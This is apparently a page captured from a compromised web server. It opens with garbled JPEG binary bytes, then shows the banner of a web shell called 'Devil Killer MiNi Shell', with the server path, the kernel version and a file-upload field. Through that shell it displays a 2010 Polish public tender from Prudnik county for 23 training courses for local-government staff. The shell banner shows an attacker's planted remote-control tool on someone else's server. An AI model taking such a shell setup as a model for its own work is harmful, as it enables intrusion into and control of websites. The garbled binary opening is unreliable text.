JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100916/254743-N-2010.html

<p class="kh_header"><b>Prudnik: Przeprowadzenie szkoleń dla kadr samorządów  Powiatu Prudnickiego</b><br>
<b>Numer ogłoszenia: 254743 - 2010; data zamieszczenia: 16.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Prudniku , ul. Tadeusza Kościuszki 76, 48-200 Prudnik, woj. opolskie, tel. 077 4381 700, faks 077 4381 701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatprudnicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla kadr samorządów  Powiatu Prudnickiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie 23 szkoleń dla pracowników jednostek samorządu terytorialnego (JST) Powiatu Prudnickiego. Usługa obejmować będzie zorganizowanie i przeprowadzenie następujących szkoleń: 
1)Kodeks postępowania administracyjnego,
2)Rozwiązywanie problemów praktycznych przy udzielaniu zamówień publicznych (Pzp),
3)Ustawa prawa ochrony środowiska,
4)Ustawa o pracownikach samorządowych,
5)Profesjonalna obsługa klienta w urzędzie, 
6)Ochrona danych osobowych w JST,
7)Zasady tworzenia prawa miejscowego oraz innych aktów prawnych wydawanych przez ,JST (wykład +warsztaty),
8)Prawo miejscowe organów samorządu terytorialnego. Tryb podejmowania uchwał i zasady ich ogłaszania z uwzględnieniem nowych regulacji,
9)Techniki radzenia sobie ze stresem,
10)Efektywne zarządzanie zasobami ludzkimi w urzędzie z elementami motywacji,
11)Komunikacja w zespole,
12)Vademecum inwestora, w tym prawo budowlane i umowy o roboty  budowlane,
13)Dyscypliny finansów publicznych oraz kara za jej naruszenie,
14)Rozliczanie projektów finansowanych z UE + podstawowe informacje z zakresu pozyskiwania źródła finansowania,
15)Stosowanie instrukcji kancelaryjnej i elektronicznego obiegu dokumentów,
16)Nadzór inwestycyjny nad uchwaleniem prawa miejscowego i środków zaskarżania uchwał organu stanowiącego JST (wykład),
17)Zasady rachunkowości i sprawozdawczości budżetowej oraz podstawy ordynacji podatkowej,
18)Ochrona informacji niejawnych,
19)Techniki autoprezentacji i wystąpień publicznych (kierowane do kierowników jednostek oraz sekretarzy),
20)Podpis elektroniczny,
21)Prawo pracy,
22)ISO - wprowadzenie i przygotowanie do certyfikacji,
23)Wybrane zagadnienia związane z pracą rzecznika prasowego.
Założenia poszczególnych szkoleń:
1Kodeks postępowania administracyjnego  
Zorganizowanie i przeprowadzenie 3 dniowego szkolenia dla 9 grup po 10-11 uczestników
Łączna liczba uczestników szkolenia: 93
Miejsce szkolenia: Prudnik 
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Postępowanie administracyjne: (Zasady ogólne KPA, Podmioty postępowania administracyjnego, Organ prowadzący postępowanie)
2)Przepisy Porządkowe i środki oddziałujące na przebieg postępowania: (Doręczenia, wezwania, protokoły, Udostępnienie akt postępowania, Terminy załatwiania spraw)
3)Postępowanie przed organem I instancji: (Wszczęcie postępowania, Środki dowodowe, Zawieszenie i umorzenie postępowania)
4)Akty kończące postępowanie: (decyzja, ugoda administracyjna, postanowienie)
5)Postępowanie przed organem II instancji: (Środki prawne w postępowaniu administracyjnym (odwołanie, zażalenia), (Postępowanie odwoławcze)
6)Nadzwyczajne postępowanie administracyjne: (Wznowienie postępowania, Zmiana decyzji ostatecznej bez nabycia prawa, Zmiana decyzji ostatecznej z nabyciem prawa, Stwierdzenie nieważności decyzji administracyjnej, Stwierdzenie wygaśnięcia decyzji, Punkty od 1-6 w praktyce i w świetle orzecznictwa)
2.Rozwiązywanie problemów praktycznych przy udzielaniu zamówień publicznych (PZP) 
Zorganizowanie i przeprowadzenie 2 dniowego szkolenie dla 1 grupy liczącej 11 uczestników 
Łączna liczba uczestników szkolenia: 11
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Opis przedmiotu zamówienia
2)Ustalanie wartości szacunkowej zamówienia
3)Specyfikacja istotnych warunków zamówienia
4)Przebieg postępowania o zamówienie publiczne
5)Umowy w sprawie zamówienia publicznego 
6)Środki ochrony prawnej
7)Kontrola udzielania zamówień 
8)Korekty finansowe 
9)Naruszenie dyscypliny finansów publicznych Pzp przy udzielaniu zamówień publicznych
3.Ustawa prawo ochrony środowiska 
Zorganizowanie i przeprowadzenie 1 dniowego szkolenia dla 1 grupy liczącej 8 uczestników
Łączna liczba uczestników szkolenia: 8
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Ochrona środowiska w procesie inwestycyjnym
2)Zasady ochrony i korzystania ze środowiska
3)Krajowy Rejestr Uwalniania i Transferu Zanieczyszczeń
4)Pomiary wielkości emisji - wymagania w odniesieniu do laboratoriów wykonujących te pomiary
5)Omówienie założeń ustawy o zapobieganiu szkodom w środowisku i ich naprawie
4.Ustawa o pracownikach samorządowych 
Zorganizowanie i przeprowadzenie 1 dniowego szkolenia dla 1 grupy liczącej 8 uczestników
Łączna liczba uczestników szkolenia: 8
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Zmiana podstaw zatrudnienia w nowej ustawie o pracownikach samorządowych z 2008 r.
2)Nowe zasady naboru na stanowiska urzędnicze
3)Nowe grupy stanowisk w samorządach
4)Wprowadzenie wymogu odbycia służby przygotowawczej
5)Obowiązki pracowników samorządowych
6)Ocena pracowników samorządowych
7)Czas pracy pracowników samorządowych
8)Zmiana zasad wynagradzania pracowników samorządowych
9)Odpowiedzialność porządkowa pracowników samorządowych
5.Profesjonalna obsługa klienta w urzędzie 
Zorganizowanie i przeprowadzenie 3 dniowego szkolenia dla 2 grup liczących  po 12-13 uczestników
Łączna liczba uczestników szkolenia: 23
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Wizerunek pracownika i wizerunek instytucji
2)Podstawowe standardy w komunikacji z klientem
3)Narzędzia skutecznej komunikacji z klientem
4)Rola standardów współpracy w procesie profesjonalnej obsługi
5)Typologia klientów a standardy postępowania
6)Rozwiązywanie konfliktów - jak radzić sobie z (trudnym klientem)
7)Zarządzanie emocjami w procesie obsługi klienta
6.Ochrona danych osobowych w JST 
Zorganizowanie i przeprowadzenie 1 dniowego szkolenia dla 2 grup liczących po 12-13 uczestników
Łączna liczba uczestników szkolenia: 23
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Podstawowe pojęcia dotyczące ochrony danych osobowych (Czym są dane osobowe?, Co to jest zbiór danych?, Czym jest przetwarzanie danych, Administrator danych osobowych, Administrator bezpieczeństwa informacji, Zgoda na przetwarzanie danych osobowych, System informatyczny)
2)Przepisy dotyczące ochrony danych osobowych: (Ustawa o ochronie danych osobowych, Podstawowe akty wykonawcze do ustawy)
3)Zasady przetwarzania danych osobowych: (Kiedy można przetwarzać dane osobowe?, Jakie mamy obowiązki, gdy przetwarzamy dane?, Jakich danych osobowych nie można przetwarzać?, Udostępnianie danych osobowych?, Szczególne kategorie danych osobowych, Akta osobowe, której dane dotyczą, Przekazywanie danych osobowych za granicę, Przetwarzanie danych osobowych przy świadczeniu usług drogą elektroniczną,
4)Główne obowiązki administratora danych osobowych 
5) Rejestracja zbiorów danych osobowych: (Kiedy i gdzie mamy obowiązek zarejestrować zbiór danych?, Jak powinno wyglądać zgłoszenie zbioru danych osobowych do rejestracji?)
6)Metody zabezpieczania danych osobowych: (Do czego jesteśmy zobowiązani?, Wymagania formalne i organizacyjne związane z ochroną danych osobowych, Wymagania techniczne związane z ochroną danych osobowych)
7)Odpowiedzialność karna i dyscyplinarna za naruszenie przepisów o ochronie informacji.
8)Nadzór nad ochroną danych osobowych. Prawo obywatela do ochrony swoich danych osobowych
7.Zasady tworzenia prawa miejscowego oraz innych aktów prawnych wydawanych przez JST (wykład + warsztaty) 
Zorganizowanie i przeprowadzenie 3 dniowego szkolenia dla 1 grupy  liczącej  9 uczestników  
Łączna liczba uczestników szkolenia: 9
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Uwagi o Kodeksie Rzetelnych Praktyk Legislacyjnych a lokalna praktyka (braki i sukcesy w zakresie rzetelnej legislacji)
2)Problem stosowania zasad tworzenia prawa w praktyce sporządzania aktu prawa miejscowego
3)Podporządkowanie działania prawotwórczego organów stanowiących jednostek samorządu terytorialnego procedurom decyzyjnym
4)Nadanie ustanowionym aktom normatywnym określonej prawnie formy - praca nad stworzeniem projektu aktu prawa miejscowego 
5)Zakaz powtarzania treści przepisów z innych aktów normatywnych w praktyce
6)Wskazanie na zastosowane zasady tworzenia prawa - wypowiedzi poparte przykładami
7)Analiza przypadków i konstruktywne rozwiązania pojawiających się problemów przy tworzeniu prawa miejscowego
8)Zagadnienie podania aktów prawa miejscowego do wiadomości publicznej
9)Skutki naruszenia zasad tworzenia prawa w praktyce
10)Usuwanie stanu niezgodnego z prawem w praktyce
8.Prawo miejscowe organów samorządu terytorialnego. Tryb podejmowania uchwał i zasady ich ogłaszania z uwzględnieniem nowych regulacji 
Zorganizowanie i przeprowadzenie 2 dniowego szkolenia dla  2 grupy liczącej  7 uczestników  
Łączna liczba uczestników szkolenia: 14
Miejsce szkolenia: Prudnik 
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Klasyfikacja aktów prawnych podejmowanych przez organy gminy
2)Pojęcie aktu prawa miejscowego - formalne i materialne ujecie aktu prawa miejscowego.
3)Stanowienie aktu prawa miejscowego
4)Współdziałanie i jego rodzaje w stanowieniu aktów prawa miejscowego.
5)Promulgacja aktów prawa miejscowego i wejście w życie 
6)Przekazywanie aktów prawa miejscowego organom nadzoru (także w formie elektronicznej)
7)Przepisy porządkowe
8)Prowadzenie zbiorów aktów prawa miejscowego
9)Wstrzymanie wykonania aktów prawnych
10)Zaskarżanie aktów prawa miejscowego do sądu administracyjnego
11)Zasady tworzenia prawa w ujęciu technik legislacyjnych
12)Redagowanie tekstu uchwały
13)Postępowanie przed sądem administracyjnym w sprawie stwierdzenia nieważności aktu prawa miejscowego 
14)Stwierdzenie nieważności przepisów prawa miejscowego i jego skutki.
15)Środki ochrony prawnej przed ingerencją nadzorczą wojewody w treść aktów prawa miejscowego.
9.Techniki radzenia sobie ze stresem 
Zorganizowanie i przeprowadzenie 3 dniowego szkolenia dla 3 grup liczących 11 uczestników 
Łączna liczba uczestników szkolenia: 33
Miejsce szkolenia: Prudnik 
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Pojęcie stresu, kategorie stresów, sposoby radzenia sobie - w kontekście własnych doświadczeń
2)Wymiar psychiczny i fizyczny stresu - autodiagnoza
3)Skuteczne i nieskuteczne sposoby radzenia sobie ze stresem,
4)Wachlarz technik radzenia sobie ze stresem (ćwiczenia z elementami teoretycznymi dotyczącymi metody): Ćwiczenia oddechowe, Elementy muzykoterapii i choreoterapii, Koncentracja  medytacj, Twórcza wizualizacja, Trening autogenny Schulza, Stworzenie własnego repertuaru metod radzenia sobie, z uwzględnieniem nowo poznanych
10. Efektywne zarządzanie zasobami ludzkimi w urzędzie z elementami motywacji
Zorganizowanie i przeprowadzenie 3 dniowego szkolenia dla 1 grupy liczącej 8 uczestników,  
Łączna liczba uczestników szkolenia: 8
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Nabór pracowników - metodologia przeprowadzania, a w tym: Zasady konkurencyjnego naboru pracowników, Przygotowanie procesu rekrutacji i selekcji (budowa profilu kompetencji, metody selekcji, rodzaje wywiadów selekcyjnych i stosowania metody oraz testy)
2)Wprowadzenie na miejsce pracy, a w tym: Zasady przeprowadzania procesu adaptacyjnego oraz korzyści z prawidłowo przeprowadzonego procesu adaptacyjnego, Etapy procesu adaptacyjnego
3)Szkolenie pracowników - metodologia przeprowadzania, a w tym: Projektowanie działań szkoleniowych, wyznaczanie celów, Analiza potrzeb szkoleniowych - metody, Wybór firmy szkoleniowej - analiza czynników decydujących, Ocena efektywności szkoleń, stosowanie metody i ich efektywność, Dokumenty wykorzystywane w procesie szkoleń pracowników
4)Ocena pracownika - metodologia przeprowadzenia, a w tym: Cele i rodzaje systemów oceniających, Rozwój a ewaluacja, Metody wykorzystywane w ocenianiu pracowników, przeszkody w skutecznym ocenianiu - jak je pokonywać, wykorzystywana dokumentacja, Rozmowa oceniająca - etapy, zasady jej prowadzenia, Obiektywność oceny, eliminowanie typowych błędów oceny
5)Program rozwoju zawodowego i awansowania pracownika - metodologia przeprowadzania: Znaczenie kultury organizacyjnej dla zarządzania kadrami, Kryteria uwzględniane przy tworzeniu planu rozwoju pracownika, Czynniki decydujące o planowaniu kariery, Diagnoza potencjału rozwojowego pracownika, Sporządzanie planu ścieżki kariery zawodowej (cechy planu, korzyści dla urzędu i pracownika)
6)Motywowanie pracowników
11.Komunikacja w zespole 
Zorganizowanie i przeprowadzenie 3 dniowego szkolenia dla 2 grup liczących 8-9 uczestników,  
Łączna liczba uczestników szkolenia: 17
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Zespół - teoria i praktyka
2)Trudności w relacjach i komunikacji oraz sposoby radzenia sobie z nimi - ćwiczenia i teoria (rozwiązywanie konfliktów, przeciwdziałanie nieporozumieniom, asertywność 
w komunikacji)
3)Ćwiczenie kompetencji społecznych zgłoszonych przez uczestniczki i uczestników
4)Wspólne poszukiwanie rozwiązań dla trudnych sytuacji zgłoszonych przez uczestniczki 
i uczestników
5)Integracja zdobytej wiedzy i umiejętności (indywidualne plany rozwoju w obszarze komunikacji i współpracy zespołu, plany komunikacyjne dla miejsc pracy uczestniczek 
i uczestników)
12.Vademecum inwestora, w tym prawo budowlane i roboty o umowy budowlane 
Zorganizowanie i przeprowadzenie 2 dniowego szkolenia dla 2 grup liczących po 3-4  uczestników 
Łączna liczba uczestników szkolenia: 7
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej    następujący zakres tematyczny:
1)Ogólne zasady postępowania administracyjnego 
2)Przebieg postępowania - etapy: dowody, rozprawy, zawieszenie postępowania 
3)Decyzja, postanowienie, ugoda
4)Odwołania i zażalenia
5)Kompetencje organu odwoławczego
6)Zmiana w czasie ostatecznej decyzji administracyjnej 
7)Procedury poprzedzające zawarcie umów inwestycyjnych na gruncie kodeksu cywilnego. 
8)Formy organizacyjne wykorzystywane przez inwestorów i jednostki wykonawstwa budowlanego
9)Rodzaje umów inwestycyjnych
10)Rękojmia i gwarancja przy wykonywaniu umów inwestycyjnych
11)Przekształcenia podmiotowe i przedmiotowe umów inwestycyjnych
12)Zmiany przepisów regulujących umowy o roboty budowlane
13)Wniosek o wydanie decyzji o warunkach zabudowy lub decyzji o ustaleniu lokalizacji inwestycji celu publicznego
14)Procedura wydania decyzji o WZ i ZT i decyzji o ustaleniu lokalizacji inwestycji celu publicznego
15)Inwestycje nie wymagające pozwolenia na budowę
16)Decyzja o pozwoleniu na budowę
17)Rozpoczęcie i realizacja budowy
18)Przyjęcie obiektu do użytkowania.
13.Dyscyplina finansów publicznych oraz kara za jej naruszenie 
Zorganizowanie i przeprowadzenie 3 dniowego szkolenie dla 1 grupy liczącej 8 uczestników 
Łączna liczba uczestników szkolenia: 8
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Istota ,  cele i zasady funkcjonowania  instytucji dyscypliny finansów publicznych
2)Zakres podmiotowy odpowiedzialności za naruszenie dyscypliny finansów publicznych (podstawy formalno-prawne odpowiedzialności)
3)Katalog czynów określających naruszenie dyscypliny finansów publicznych
4)Postępowanie w sprawie o naruszenie dyscypliny finansów publicznych (ujawnienie naruszenia dyscypliny finansów publicznych, zawiadomienie o naruszeniu dyscypliny finansów publicznych, postępowanie sprawdzające i wyjaśniające, prawa obwinionego o naruszenie dyscypliny finansów publicznych w toku postępowania, rozprawa, orzeczenie, środki odwoławcze
5)Okoliczności łagodzące i uniewinniające: stopień winy, zdarzenie losowe, szkodliwość czynu stanowiącego naruszenie dyscypliny finansów publicznych
6)Kary za naruszenie dyscypliny finansów publicznych i ich skutki: rejestr ukaranych, przedawnienie karalności i zatarcie ukarania
14.Rozliczanie projektów finansowanych z UE + podstawowe informacje z zakresu pozyskiwania źródeł finansowania
Zorganizowanie i przeprowadzenie 3 dniowego szkolenia dla 1 grupy liczącej 11 uczestników. 
Łączna liczba uczestników szkolenia: 11
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej    następujący zakres tematyczny:
1)Przepisy prawa regulujące udzielanie i rozliczanie dotacji
2)Odpowiedzialność za naruszenie dyscypliny finansów publicznych
3)Sposób i forma rozliczania udzielonych dotacji: Kontrola i monitoring wykorzystania dotacji, Zgodność wydatków z przeznaczeniem określonym przez udzielającego dotacje
4)Terminowość realizacji
5)Metody przeprowadzania kontroli
6)Monitorowanie wykonywanie zadań
7)Rozliczanie dotacji:  Sprawozdania z realizacji dotacji, Weryfikacja sprawozdań, Ewidencja księgowa
8)Zwrot dotacji niewykorzystanej lub wykorzystanej niezgodnie z przeznaczeniem: Terminy rozliczeń, Ustalenie wielkości kwoty podlegającej zwrotowi.
15.Stosowanie instrukcji kancelaryjnej elektroniczny obieg dokumentów 
Zorganizowanie i przeprowadzenie 2 dniowego szkolenia dla 1 grupy liczącej 13 uczestników 
Łączna liczba uczestników szkolenia: 13
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej    następujący zakres tematyczny:
1)Omówienie roli instrukcji kancelaryjnej, a szczególnie jednolitego rzeczowego wykazu akt w obiegu i tworzeniu dokumentacji
2)Przyjmowanie i obieg korespondencji. Ewidencjonowanie wpływów w dzienniku korespondencji
3) Charakterystyka bez dziennikowego systemu kancelaryjnego
4)Wykaz akt jako jednolita rzeczowa kwalifikacja akt.
5)Tworzenie dokumentacji na stanowiskach pracy:
6)Praktyczne korzystanie z jednolitego wykazu akt - ćwiczenia
7) Metody porządkowania akt spraw związanych z nadawaniem numerów poszczególnym sprawom pod kątem zgodności z jednolitym rzeczowym wykazem akt.
8)Sporządzanie szczegółowych wyciągów z wykazu akt dla poszczególnych stanowisk pracy, komórek organizacyjnych oraz jednostek organizacyjnych- przykłady
9)Zasady korespondencji urzędowej - redagowanie pism urzędowych
10)Przygotowywanie akt spraw ostatecznie załatwionych do archiwum zakładowego
11)Omówienie przykładów wdrażania elektronicznego obiegu dokumentów i związane z tym utrudnienia wynikające z uchybień i nieprawidłowości w stosowaniu instrukcji kancelaryjnej, a szczególnie rzeczowego wykazu akt
16.Nadzór instancyjny nad uchwaleniem prawa miejscowego i środki zaskarżania uchwał organu stanowiącego JST (wykład) 
Zorganizowanie i przeprowadzenie 2 dniowego szkolenia dla 1 grupy liczącej 8 uczestników 
Łączna liczba uczestników szkolenia: 8
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Akty prawa miejscowego: Pojęcie i klasyfikacja, Organy stanowiące akty prawa miejscowego,  Procedura stanowienia aktów prawa miejscowego, Publikacja aktów prawa miejscowego, Prawo miejscowe a inne uchwały Rady Gminy,  Jak napisać dobrą uchwałę - część warsztatowa
2)Nadzór nad samorządem terytorialnym: Nadzór a kontrola - porównanie pojęć, Organy nadzoru, Środki nadzoru, Kryteria nadzoru, Tryb postępowania nadzorczego, Obowiązki gminy w ramach nadzoru instancyjnego, Nadzór w zakresie stanowienia aktów prawa miejscowego, Praktyczne przykłady postępowań nadzorczych, Wybrane orzecznictwo SA i rozstrzygnięcia nadzorcze wojewody
3)Zaskarżanie uchwał Rady Gminy do sądów administracyjnych: Podstawy prawne złożenia skargi, Środki zaskarżania uchwał, Podmioty uprawnione do złożenia skargi, Obowiązki gminy w zakresie postępowania skargowego, Procedura postępowania w sprawach ze skargi na uchwałę Rady Gminy, Skutki wniesienia skargi, Rozstrzygnięcia sądów w zakresie spraw ze skargi na uchwały Rady Gminy
4)Praktyczne przykłady skarg i odpowiedzi na skargi - część warsztatowa: Konstrukcja skargi i jej sporządzanie, Odpowiedź na skargę, elementy i zasady sporządzania
17.Zasady rachunkowości i sprawozdawczości budżetowej oraz podstawy ordynacji podatkowej 
Zorganizowanie i przeprowadzenie 2 dniowego szkolenia dla 2 grup liczących po 11 uczestników  
Łączna liczba uczestników szkolenia: 22
Miejsce szkolenia: Prudnik
Szkolenie powinno objąć co najmniej  następujący zakres tematyczny:
1)Ogólne zasady finansów publicznych 
2)Ogólne zasady rachunkowości, a rachunkowość budżetowa 
3)Wybrane aspekty rachunkowości budżetowej
4)Polityka rachunkowości
5)Odpowiedzialność za naruszenie dyscypliny finansów publicznych 
6)Sprawozdanie finansowe jednostki budżetowej - studium przypadku
7)Zasady prowadzenia ksiąg rachunkowych w jednostkach budżetowych 
8)Zasady ewidencji księgowej 
9)Wycena i ewidencja wybranych składników majątku jednostek sektora finansów publicznych 
10)Dowody księgowe 
11) Inwentaryzacja roczna 
12)Sprawozdawczość w jednostkach budżetowych
18.Ochrona informacji niejawnych
Zorganizowanie i przeprowadzenie 1 dniowego szkolenia mającego  formę warsztatów z trenerem dla  5 uczestników. 
Łączna liczba uczestników szkolenia: 5
Miejsce szkolenia: Prudnik
Celem szkolenia jest  wymiana dobrych praktyk oraz konsultowanie trudności napotykanych przez uczestników  w trakcie wykonywania obowiązków służbowych. Wykonawca zobowiązany jest do zapewnienie odpowiedniego trenera, który wygłosi krótki wykład na temat  ochrony informacji niejawnych, oraz będzie moderował dyskusję i uczestniczył w wymianie doświadczeń i opinii wygłaszanych przez uczestników szkolenia.
Program seminarium szkoleniowego do ustalenia z Zamawiającym, odpowiednio przed spotkaniem.
19.Techniki autoprezentacji i wystąpień publicznych (kierowane do kierowników jednostek oraz sekretarzy)
Zorganizowanie i przeprowadzenie 1 dniowego szkolenia mającego  formę warsztatów z trenerem dla  4 uczestników. 
Łączna liczba uczestników szkolenia: 4
Miejsce szkolenia: Prudnik
Celem szkolenia jest wymiana dobrych praktyk oraz konsultowanie trudności napotykanych przez uczestników  w trakcie wykonywania obowiązków służbowych. Wykonawca zobowiązany jest do zapewnienie odpowiedniego trenera, który wygłosi krótki wykład na temat technik autoprezentacji i wystąpień publicznych, oraz będzie moderował dyskusję i uczestniczył w wymianie doświadczeń i opinii wygłaszanych przez uczestników szkolenia.
Program seminarium szkoleniowego do ustalenia z Zamawiającym, odpowiednio przed spotkaniem.
20.Podpis elektroniczny
Zorganizowanie i przeprowadzenie 1 dniowego szkolenia mającego  formę warsztatów z trenerem dla  4 uczestników. 
Łączna liczba uczestników szkolenia: 4
Miejsce szkolenia: Prudnik
Celem szkolenia jest wymiana dobrych praktyk oraz konsultowanie trudności napotykanych przez uczestników  w trakcie wykonywania obowiązków służbowych.
Wykonawca zobowiązany jest do zapewnienie odpowiedniego trenera, który wygłosi krótki wykład na temat podpisu elektronicznego, oraz będzie moderował dyskusję i uczestniczył w wymianie doświadczeń i opinii wygłaszanych przez uczestników szkolenia.
Program seminarium szkoleniowego do ustalenia z Zamawiającym, odpowiednio przed spotkaniem.
21. Prawo pracy
